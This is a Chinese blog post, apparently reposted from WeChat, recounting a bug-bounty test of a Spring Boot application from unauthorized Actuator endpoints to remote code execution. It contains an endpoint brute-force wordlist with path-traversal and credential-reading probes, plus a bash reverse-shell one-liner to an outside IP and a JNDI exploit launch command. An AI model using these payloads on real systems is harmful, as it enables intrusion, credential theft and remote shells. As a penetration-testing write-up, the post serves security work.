“ 作为一个安全行业的菜鸡,时不时分享自己过程中的案例与经验”
记一次后下手为慢无奖励的专属src挖掘,信息收集就不说了,反正就是那几套姿势,无非看谁的字典好使,谁花的时间多,谁心更细。
001
知已知彼
-
- Spring Boot 1.x 版本默认内置路由的根路径以 / 开始,2.x 则统一以 /actuator 开始
-
- 有些程序员会自定义 /manage、/management 或 项目相关名称 为根路径
-
- 默认内置路由名字,如 /env 有时候也会被程序员修改,如修改成 /appenv
先来简单介绍一下常见的springboot常见部分接口的作用吧:
/autoconfig |
提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过 |
/configprops |
描述配置属性(包含默认值)如何注入 Bean |
/beans |
描述应用程序上下文里全部的 Bean,以及它们的关系 |
/dump |
获取线程活动的快照 |
/env |
获取全部环境属性 |
/env/{name} |
根据名称获取特定的环境属性值 |
/health |
报告应用程序的健康指标,这些值由 HealthIndicator 的实现类提供 |
/info |
获取应用程序的定制信息,这些信息由 info 打头的属性提供 |
/mappings |
描述全部的 URI 路径,以及它们和控制器(包含 Actuator 端点)的映射关系 |
/metrics |
报告各种应用程序度量信息,比如内存用量和 HTTP 请求计数 |
/metrics/{name} |
报告指定名称的应用程序度量值 |
/shutdown |
关闭应用程序,要求 endpoints.shutdown.enabled 设置为 true(默认为 false) |
/trace |
提供基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等) |
002
投石问路
下面是一些个人比较常用的接口字典:
(同时有个细节就是可能以下目录会存在于某个子文件夹下面,缘分靠自己爆破):
admin/
web/
gateway/
manage/
/
/#/wallboard
/%20/swagger-ui.html
/Swagger/ui/index
/acl/article?id=66
/acm
/actuator
/actuator/#/wallboard
/actuator/acm
/actuator/admin/swagger-ui.html
/actuator/api-docs
/actuator/api.html
/actuator/api/index.html
/actuator/api/swagger-ui.html
/actuator/api/v2/api-docs
/actuator/api/v2/swagger.json
/actuator/archaius
/actuator/archaius/actuator/nacosdiscovery
/actuator/article?id=${7*7}
/actuator/article?id=66
/actuator/auditevents
/actuator/auditevents/actuator/intergrationgraph
/actuator/autoconfig
/actuator/beans
/actuator/beans/actuator/jolokia
/actuator/beans1
/actuator/caches
/actuator/caches/actuator/refresh
/actuator/caches/cache
/actuator/channels
/actuator/conditions
/actuator/conditions/actuator/jolokia/list
/actuator/conditions1
/actuator/configprops
/actuator/configprops/actuator/nacos
/actuator/distv2/index.html
/actuator/docs
/actuator/druid/login.html
/actuator/dubbo-provider/distv2/index.html
/actuator/dump
/actuator/env
/actuator/env/actuator/liquibase
/actuator/env/java.home
/actuator/env/spring.jmx.enabled
/actuator/env/system
/actuator/features
/actuator/features/actuator/peripheral/swagger-ui.html
/actuator/flyway
/actuator/gateway
/actuator/h2-console
/actuator/health
/actuator/health/
/actuator/health/actuator/loggers
/actuator/health/nacos
/actuator/heapdump
/actuator/heapdump/actuator/loggers/nacos
/actuator/httptrace
/actuator/httptrace/actuator/mappings
/actuator/hystrix.stream
/actuator/hystrix.stream/*/actuator/swagger
/actuator/info
/actuator/info/actuator/metrics
/actuator/jolokia
/actuator/jolokia/*/actuator/static/swagger.json
/actuator/logfile
/actuator/logfile/actuator/sw/swagger-ui.html
/actuator/loggers
/actuator/loggers/
/actuator/loggers/actuator/metrics/nacos
/actuator/management/heapdump
/actuator/mappings
/actuator/mappings/actuator/monitor/conditions
/actuator/metrics
/actuator/metrics/
/actuator/metrics/actuator/monitor/env
/actuator/monitor/auditevents
/actuator/monitor/loggers
/actuator/nacos-config/actuator/swagger-resourcesce
/actuator/nacos-discovery/actuator/swagger-ui
/actuator/nacosconfig
/actuator/prometheus/actuator/swagger-dubbo/api-docs
/actuator/refresh/actuator/peripheral/v2/api-docs
/actuator/restart
/actuator/scheduledtasks
/actuator/scheduledtasks/actuator/monitor/mappings
/actuator/sentinel
/actuator/service-registry/actuator/prometheus
/actuator/sessions/
/actuator/sessions/actuator/swagger-ui.html
/actuator/swagger-ui/index.html
/actuator/template/swagger-ui.html
/actuator/threaddump
/actuator/threaddump/actuator/monitor/scheduledtasks
/actuator/trace
/actuator/user/swagger-ui.html
/api-docs
/api.html
/api/swagger-ui.html
/api/v2/login
/api/v2/swagger-resources
/api/v2/swagger-ui.html
/article?id=${7*7}
/auditevents
/autoconfig
/beans
/beans1
/caches
/channels
/clients
/clients/actuator/system/showOsInfo
/clients/all/actuator/tra
/clients/saveOrUpdate/actuator/trace
/cloudfoundryapplication
/conditions
/conditions1
/configprops
/distv2/index.html
/doc.html
/docs
/docs/
/druid/*/actuator/swagger/codes
/druid/api.html
/druid/basic.json
/druid/datasource.html
/druid/index.html
/druid/login.html
/druid/spring.html
/druid/sql.html
/druid/wall.html
/druid/webapp.html
/druid/websession.html
/druid/weburi.html
/dubbo-provider/distv2/index.html
/dump
/entity/all
/env
/env/java.home
/env/nacos
/env/spring
/env/spring.jmx.enabled
/error/actuator/monitor/threaddump
/eureka
/eureka/*/actuator/service-registry
/features
/flyway
/gateway/actuator
/gateway/actuator/auditevents
/gateway/actuator/beans
/gateway/actuator/conditions
/gateway/actuator/configprops
/gateway/actuator/env
/gateway/actuator/health
/gateway/actuator/heapdump
/gateway/actuator/httptrace
/gateway/actuator/hystrix.stream
/gateway/actuator/info
/gateway/actuator/jolokia
/gateway/actuator/logfile
/gateway/actuator/loggers
/gateway/actuator/mappings
/gateway/actuator/metrics
/gateway/actuator/scheduledtasks
/gateway/actuator/swagger-ui.html
/gateway/actuator/threaddump
/gateway/actuator/trace
/get
/get?serviceName=springboot2-nacos-discovery
/h2-console
/health
/heapdump
/heapdump.json
/httptrace
/hystrix
/hystrix.stream
/info
/intergrationgraph
/jolokia
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url
/jolokia/list
/lastn/actuator/sessions
/libs/swaggerui
/liquibase
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/logfile
/loggers
/login/admin/swagger-ui.html
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/management/heapdump
/mappings
/metrics
/metrics/
/metrics/mem
/metrics/nacos
/monitor
/monitor/auditevents
/monitor/conditions
/monitor/env
/monitor/loggers
/monitor/mappings
/monitor/scheduledtasks
/monitor/threaddump
/nacos
/nacos/v1/cs/configs
/nacos/v1/cs/configs?dataId=Misplaced
/nacos/v1/ns/instance
/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery
/nacos/v2/cs/configs
/nacos/v2/cs/configs?dataId=Misplaced
/nacos/v2/ns/instance
/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery
/oauth/authorize/actuator/swagger/index.html
/oauth/check_token/actuator/swagger/static/index.html
/oauth/client/token/api-docs
/oauth/confirm_access/actuator/system/
/oauth/error/actuator/system/env
/oauth/get/token/api.html
/oauth/refresh/token/api/doc
/oauth/remove/token/api/index.html
/oauth/token/actuator/system/mappings
/oauth/token/list/api/swagger
/oauth/user/token/api/swagger-resources
/oauth/userinfo/api/swagger-ui.html
/peripheral/swagger-ui.html
/peripheral/v2/api-docs
/prometheus
/redis/keysSize/api/swagger/ui
/redis/memoryInfo/api/swaggerui
/refresh
/restart
/scheduledtasks
/services
/services/1
/services/api/v2/api-docs
/services/findAlls/api/v1/api-docs
/services/findOnes/api/v1/login
/services/granted/api/v1/swagger-resources
/services/saveOrUpdate/api/v1/swagger-ui.html
/sessions
/shutdown
/spring-security-oauth-resource/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/static/swagger.json
/sw/swagger-ui.html
/swagger
/swagger-dubbo/api-docs
/swagger-resources
/swagger-resources/actuator/shutdown
/swagger-resources/configuration/security
/swagger-resources/configuration/security/actuator/spring-security-oauth-resource/swagger-ui.html
/swagger-resources/configuration/ui
/swagger-resources/configuration/ui/actuator/spring-security-rest/api/swagger-ui.html
/swagger-ui
/swagger-ui.html
/swagger-ui.html#
/swagger-ui.html/api/v2/swagger.json
/swagger-ui/html
/swagger-ui/index.html
/swagger/codes
/swagger/index.html
/swagger/static/index.html
/swagger/swagger-ui.html
/swagger/ui
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/system/
/system/druid/index.html
/system/env
/system/mappings
/system/showOsInfo
/system/showProperties
/template/swagger-ui.html
/threaddump
/trace
/user/swagger-ui.html
/v1.1/swagger-ui.html
/v1.2/swagger-ui.html
/v1.3/swagger-ui.html
/v1.4/swagger-ui.html
/v1.5/swagger-ui.html
/v1.6/swagger-ui.html
/v1.7/swagger-ui.html
/v1.8/swagger-ui.html
/v1.9/swagger-ui.html
/v1/agent/self/actuator/system/showProperties
/v1/api-docs
/v1/catalog/service/app
/v1/catalog/services/actuator/threaddump
/v2.0/swagger-ui.html
/v2.1/swagger-ui.html
/v2.2/swagger-ui.html
/v2.3/swagger-ui.html
/v2/api-docs
/v2/api-docs?group=swagger接口文档
/v2/swagger.json
/v3/api-docs
/validata/code
/webjars/**/actuator/nacosconfig
/webpage/system/druid/index.html
/api/index.html
/api/v2/api-docs
/actuator/swagger-ui.html
/env/(name)
003
依样画瓢
目标存在很多未授权接口,就可能存在好几种方式的RCE漏洞
我一般遇到很多可访问的接口都先用工具过一下,因为工具可以简单帮忙判断是否存在利用条件,而不是一个一个接口去访问。
https://github.com/rabbitmask/SB-Actuator
https://github.com/0x727/SpringBootExploit
004
迷途知返
有一说一,我对上面可能存在的RCE的利用姿势都试了一遍,不知道是我人品太差了还是怎么滴,没有一个可以RCE,搞到大半夜我都开始怀疑人生。
复现参考文章:
https://github.com/LandGrey/SpringBootVulExploit
jolokia Realm JNDI RCE利用条件:
-
目标网站/jolokia/list 接口查看是否存在 type=MBeanFactory 和 createJNDIRealm 关键词 ☑️
-
目标可以请求攻击者的服务器(请求可出外网) ☑️ dnslog探测成功
这两个起初基础条件都符合啊,于是我就不信邪,继续刚这个RCE利用,参考复现文章搭建的利用环境,vps有http请求,但死活就是弹不回shell,于是开始怀疑人生重新检查复现步骤,步骤无错误!!!于是触发思考
-
利用JNDI 注入触发漏洞
-
会不会是版本问题?
-
是否也可以借鉴log4j漏洞复现?
005
峰回路转
利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar快速搭建漏洞利用环境
反弹shell:bash -c 'exec bash -i &>/dev/tcp/111.111.111.111/4444 <&1'
监听命令:nc -lnvp 4444
工具地址:https://github.com/Zard-ethan/JNDI-Injection-Exploit-1.0-SNAPSHOT-all
编码地址:https://www.jackson-t.ca/runtime-exec-payloads.html
启动命令:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,ZGly}|{base64,-d}|{bash,-i}" -A 111.111.111.111
利用以下python脚本进行漏洞利用,修改脚本中目标与RMI利用地址,然后运行脚本
https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py
006
漏洞重复
原文始发于微信公众号(陋室安全杂货铺):记一次SpringBoot未授权到RCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论